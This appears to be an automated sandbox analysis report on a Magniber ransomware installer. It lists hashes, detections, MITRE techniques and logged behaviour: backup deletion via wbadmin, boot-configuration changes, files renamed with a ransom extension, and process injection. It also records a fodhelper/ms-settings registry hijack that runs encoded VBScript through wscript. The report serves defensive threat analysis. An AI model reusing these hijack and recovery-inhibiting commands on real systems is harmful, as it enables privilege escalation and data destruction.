magniber | 271c888d1a4e80039183b8340131090f20d43a23dddf27a1b2f7f0163e8b5aa9

Analysis

max time kernel
299s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
05-07-2022 06:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

508e8538c481ab57bb700d88ccc5ad644c8e2348f7612eadcb1e536f27aba1df.msi
Size

20.7MB
MD5

30df77a05a3ff9da6cfce5fd7e4d1dfa
SHA1

f1dba529bca024d000cfef50bb8aa9c603077c88
SHA256

508e8538c481ab57bb700d88ccc5ad644c8e2348f7612eadcb1e536f27aba1df
SHA512

91bf4bcc4b60c73d24830bb7c8094af55ac7028bc9315970ad5fed8bd3a274ccc7a8497aa17ba954543d5ee039f2b4825f561cb2c236aab996210857a4eb6bee

Score

10^/10

magniber evasion ransomware

Malware Config

Signatures

Detect magniber ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1800-133-0x000001DBBB630000-0x000001DBBB643000-memory.dmp	family_magniber
behavioral2/memory/2268-134-0x000001BD98F50000-0x000001BD98F5A000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 32 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

bcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2284	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3748	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3052	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3944	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3216	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1076	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3592	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4116	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3924	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3552	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1520	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	872	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4648	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5116	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4884	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	796	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4948	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1472	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2984	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4036	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3228	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3984	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	332	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2068	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4116	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	2100	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4536	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	2100	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1464	2100	bcdedit.exe

Modifies boot configuration data using bcdedit 1 TTPs 16 IoCs

ransomware evasion

Inhibit System Recovery

T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
3016	bcdedit.exe
3052	bcdedit.exe
3944	bcdedit.exe
3216	bcdedit.exe
3592	bcdedit.exe
4116	bcdedit.exe
1520	bcdedit.exe
872	bcdedit.exe
4884	bcdedit.exe
796	bcdedit.exe
2984	bcdedit.exe
8	bcdedit.exe
3984	bcdedit.exe
332	bcdedit.exe
4244	bcdedit.exe
1464	bcdedit.exe

Deletes System State backups 3 TTPs 8 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exe

pid process

2284 wbadmin.exe
4464 wbadmin.exe
3552 wbadmin.exe
5116 wbadmin.exe
1472 wbadmin.exe
3228 wbadmin.exe
2068 wbadmin.exe
1988 wbadmin.exe
Deletes backup catalog 3 TTPs 8 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exe

pid process

3748 wbadmin.exe
1076 wbadmin.exe
3924 wbadmin.exe
4648 wbadmin.exe
4948 wbadmin.exe
4036 wbadmin.exe
4116 wbadmin.exe
4536 wbadmin.exe

pid	process
2284	wbadmin.exe
4464	wbadmin.exe
3552	wbadmin.exe
5116	wbadmin.exe
1472	wbadmin.exe
3228	wbadmin.exe
2068	wbadmin.exe
1988	wbadmin.exe

pid	process
3748	wbadmin.exe
1076	wbadmin.exe
3924	wbadmin.exe
4648	wbadmin.exe
4948	wbadmin.exe
4036	wbadmin.exe
4116	wbadmin.exe
4536	wbadmin.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\DisableUndo.crw => C:\Users\Admin\Pictures\DisableUndo.crw.vcedfokcy	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\RedoConvertTo.tif => C:\Users\Admin\Pictures\RedoConvertTo.tif.vcedfokcy	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\SendRemove.png => C:\Users\Admin\Pictures\SendRemove.png.vcedfokcy	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\WatchGet.tiff	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\WatchGet.tiff => C:\Users\Admin\Pictures\WatchGet.tiff.vcedfokcy	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

1800 MsiExec.exe

pid	process
1800	MsiExec.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exewbadmin.exewbadmin.exe

description	ioc	process
File created	C:\Windows\Installer\e57a4cb.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57a4cb.msi	msiexec.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4628 3284 WerFault.exe DllHost.exe

pid	pid_target	process	target process
4628	3284	WerFault.exe	DllHost.exe

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exevssvc.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000005a4eb8c89d443e990000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800005a4eb8c80000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809005a4eb8c8000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000005a4eb8c800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000005a4eb8c800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Modifies registry class 42 IoCs

Processes:

svchost.exesihost.exeRuntimeBroker.exetaskhostw.exeRuntimeBroker.exeRuntimeBroker.exeExplorer.EXEsvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/ugvmgq"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/tynbvelyp"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/nvfafnxjwgi"	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/kihasafq"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/msdgmecw"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/dvhdhhr"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/odlxbqcwocu"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/kqlyiuliueh"	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

MsiExec.exemsiexec.exe

pid process

1800 MsiExec.exe
1800 MsiExec.exe
2148 msiexec.exe
2148 msiexec.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2668 Explorer.EXE

pid	process
1800	MsiExec.exe
1800	MsiExec.exe
2148	msiexec.exe
2148	msiexec.exe

pid	process
2668	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	2268	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2268	msiexec.exe
Token: SeSecurityPrivilege	2148	msiexec.exe
Token: SeCreateTokenPrivilege	2268	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2268	msiexec.exe
Token: SeLockMemoryPrivilege	2268	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2268	msiexec.exe
Token: SeMachineAccountPrivilege	2268	msiexec.exe
Token: SeTcbPrivilege	2268	msiexec.exe
Token: SeSecurityPrivilege	2268	msiexec.exe
Token: SeTakeOwnershipPrivilege	2268	msiexec.exe
Token: SeLoadDriverPrivilege	2268	msiexec.exe
Token: SeSystemProfilePrivilege	2268	msiexec.exe
Token: SeSystemtimePrivilege	2268	msiexec.exe
Token: SeProfSingleProcessPrivilege	2268	msiexec.exe
Token: SeIncBasePriorityPrivilege	2268	msiexec.exe
Token: SeCreatePagefilePrivilege	2268	msiexec.exe
Token: SeCreatePermanentPrivilege	2268	msiexec.exe
Token: SeBackupPrivilege	2268	msiexec.exe
Token: SeRestorePrivilege	2268	msiexec.exe
Token: SeShutdownPrivilege	2268	msiexec.exe
Token: SeDebugPrivilege	2268	msiexec.exe
Token: SeAuditPrivilege	2268	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2268	msiexec.exe
Token: SeChangeNotifyPrivilege	2268	msiexec.exe
Token: SeRemoteShutdownPrivilege	2268	msiexec.exe
Token: SeUndockPrivilege	2268	msiexec.exe
Token: SeSyncAgentPrivilege	2268	msiexec.exe
Token: SeEnableDelegationPrivilege	2268	msiexec.exe
Token: SeManageVolumePrivilege	2268	msiexec.exe
Token: SeImpersonatePrivilege	2268	msiexec.exe
Token: SeCreateGlobalPrivilege	2268	msiexec.exe
Token: SeCreateTokenPrivilege	2268	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2268	msiexec.exe
Token: SeLockMemoryPrivilege	2268	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2268	msiexec.exe
Token: SeMachineAccountPrivilege	2268	msiexec.exe
Token: SeTcbPrivilege	2268	msiexec.exe
Token: SeSecurityPrivilege	2268	msiexec.exe
Token: SeTakeOwnershipPrivilege	2268	msiexec.exe
Token: SeLoadDriverPrivilege	2268	msiexec.exe
Token: SeSystemProfilePrivilege	2268	msiexec.exe
Token: SeSystemtimePrivilege	2268	msiexec.exe
Token: SeProfSingleProcessPrivilege	2268	msiexec.exe
Token: SeIncBasePriorityPrivilege	2268	msiexec.exe
Token: SeCreatePagefilePrivilege	2268	msiexec.exe
Token: SeCreatePermanentPrivilege	2268	msiexec.exe
Token: SeBackupPrivilege	2268	msiexec.exe
Token: SeRestorePrivilege	2268	msiexec.exe
Token: SeShutdownPrivilege	2268	msiexec.exe
Token: SeDebugPrivilege	2268	msiexec.exe
Token: SeAuditPrivilege	2268	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2268	msiexec.exe
Token: SeChangeNotifyPrivilege	2268	msiexec.exe
Token: SeRemoteShutdownPrivilege	2268	msiexec.exe
Token: SeUndockPrivilege	2268	msiexec.exe
Token: SeSyncAgentPrivilege	2268	msiexec.exe
Token: SeEnableDelegationPrivilege	2268	msiexec.exe
Token: SeManageVolumePrivilege	2268	msiexec.exe
Token: SeImpersonatePrivilege	2268	msiexec.exe
Token: SeCreateGlobalPrivilege	2268	msiexec.exe
Token: SeCreateTokenPrivilege	2268	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2268	msiexec.exe
Token: SeLockMemoryPrivilege	2268	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exe

pid process

2268 msiexec.exe
2268 msiexec.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

2668 Explorer.EXE

pid	process
2268	msiexec.exe
2268	msiexec.exe

pid	process
2668	Explorer.EXE

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

msiexec.exeMsiExec.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.exe

description	pid	process	target process
PID 2148 wrote to memory of 1800	2148	msiexec.exe	MsiExec.exe
PID 2148 wrote to memory of 1800	2148	msiexec.exe	MsiExec.exe
PID 1800 wrote to memory of 2384	1800	MsiExec.exe	sihost.exe
PID 1800 wrote to memory of 2396	1800	MsiExec.exe	svchost.exe
PID 1800 wrote to memory of 2484	1800	MsiExec.exe	taskhostw.exe
PID 1800 wrote to memory of 2668	1800	MsiExec.exe	Explorer.EXE
PID 1800 wrote to memory of 2676	1800	MsiExec.exe	svchost.exe
PID 1800 wrote to memory of 3284	1800	MsiExec.exe	DllHost.exe
PID 1800 wrote to memory of 3388	1800	MsiExec.exe	StartMenuExperienceHost.exe
PID 1800 wrote to memory of 3452	1800	MsiExec.exe	RuntimeBroker.exe
PID 1800 wrote to memory of 3544	1800	MsiExec.exe	SearchApp.exe
PID 1800 wrote to memory of 3700	1800	MsiExec.exe	RuntimeBroker.exe
PID 1800 wrote to memory of 4292	1800	MsiExec.exe	RuntimeBroker.exe
PID 1800 wrote to memory of 4072	1800	MsiExec.exe	backgroundTaskHost.exe
PID 1800 wrote to memory of 2124	1800	MsiExec.exe	RuntimeBroker.exe
PID 1800 wrote to memory of 2268	1800	MsiExec.exe	msiexec.exe
PID 2148 wrote to memory of 4280	2148	msiexec.exe	srtasks.exe
PID 2148 wrote to memory of 4280	2148	msiexec.exe	srtasks.exe
PID 1608 wrote to memory of 372	1608	cmd.exe	fodhelper.exe
PID 1608 wrote to memory of 372	1608	cmd.exe	fodhelper.exe
PID 372 wrote to memory of 2356	372	fodhelper.exe	wscript.exe
PID 372 wrote to memory of 2356	372	fodhelper.exe	wscript.exe
PID 4812 wrote to memory of 1712	4812	cmd.exe	fodhelper.exe
PID 4812 wrote to memory of 1712	4812	cmd.exe	fodhelper.exe
PID 1712 wrote to memory of 4948	1712	fodhelper.exe	wscript.exe
PID 1712 wrote to memory of 4948	1712	fodhelper.exe	wscript.exe
PID 5052 wrote to memory of 4472	5052	cmd.exe	fodhelper.exe
PID 5052 wrote to memory of 4472	5052	cmd.exe	fodhelper.exe
PID 4472 wrote to memory of 3468	4472	fodhelper.exe	wscript.exe
PID 4472 wrote to memory of 3468	4472	fodhelper.exe	wscript.exe
PID 4776 wrote to memory of 2552	4776	cmd.exe	fodhelper.exe
PID 4776 wrote to memory of 2552	4776	cmd.exe	fodhelper.exe
PID 2552 wrote to memory of 2008	2552	fodhelper.exe	wscript.exe
PID 2552 wrote to memory of 2008	2552	fodhelper.exe	wscript.exe
